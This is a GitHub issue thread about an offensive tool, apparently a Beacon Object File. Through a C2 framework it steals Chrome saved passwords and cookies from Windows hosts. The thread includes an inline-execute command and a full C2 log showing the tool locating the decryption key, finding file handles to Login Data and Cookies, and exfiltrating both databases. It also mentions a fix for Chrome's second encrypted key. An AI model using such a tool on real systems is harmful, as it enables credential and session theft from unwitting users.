Closed clspejd closed 1 month ago
Thanks for submitting an issue! Looks like both the passwords and cookies files were downloaded but the key failed to decrypt. Could you provide more information? I'll try to recreate the problem and fix it. What was the Windows version and Chrome version? @clspejd
Looks good when people are dedicated to resolving issues quickly without any excuses :)
OS Name - Microsoft Windows 10 Pro
OS Version - 10.0.19045 N/A Build 19045
OS Manufacturer - Microsoft Corporation
OS Configuration - Standalone Workstation
inline-execute /path/of/BOF.o
The output for which is already shared above.
I have my Red Team engagement starting from 21 July, 2024. I thought to use this tool in it. That's why I am checking beforehand whether I can rely on it or not.
If you need anything else or more info then don't hesitate to ask :)
I turned OFF Security Solution that was present. Also, I tried executing as a normal user and also with Admin privileges. But in both cases the issue persists :(
@clspejd No issues on my end today with CS as the C2. Will try Havoc later on and keep ya posted.
@clspejd Try again with the new update. Chrome added a second encrypted_key in the Local State file. Fixed the pattern searching for it.
Thanks, it's now working!! :)
I compiled it without any issues and on execution it downloads the ChromeCookie.db file too. But it fails decrypting the key and doesn't give me cookies.
Below I am attaching the complete log for you:
[+] Send Task to Agent [31 bytes]
[+] Received Output [15 bytes]: CHROME SELECTED
[+] Received Output [84 bytes]: LOOKING FOR FILE: C:\Users\\AppData\Local\Google\Chrome\User Data\Local State
[!] Received Output [27 bytes]: Decrypting the key failed.
[+] Received Output [23 bytes]: Browser PID found 5872
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND
[+] Received Output [23 bytes]: Browser PID found 5872
[+] Received Output [36 bytes]: Searching for handle to Login Data
[+] Received Output [21 bytes]: Login Data WAS FOUND
[+] Received Output [106 bytes]: Handle Name: \Device\HarddiskVolume2\Users\\AppData\Local\Google\Chrome\User Data\Default\Login Data
[+] Received Output [19 bytes]: file size is 40960
[*] Started download of file: ChromePasswords.db [40960]
[+] Finished download of file: ChromePasswords.db
[+] Received Output [32 bytes]: The file was downloaded filessly
[+] Received Output [23 bytes]: Browser PID found 6236
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND
[+] Received Output [23 bytes]: Browser PID found 7088
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[!] Received Output [40 bytes]: NO HANDLE TO Network\Cookies WAS FOUND
[+] Received Output [23 bytes]: Browser PID found 2688
[+] Received Output [41 bytes]: Searching for handle to Network\Cookies
[+] Received Output [26 bytes]: Network\Cookies WAS FOUND
[+] Received Output [111 bytes]: Handle Name: \Device\HarddiskVolume2\Users\\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
[+] Received Output [20 bytes]: file size is 262144
[*] Started download of file: ChromeCookie.db [262144]
[+] Finished download of file: ChromeCookie.db
[+] Received Output [32 bytes]: The file was downloaded filessly
[*] BOF execution completed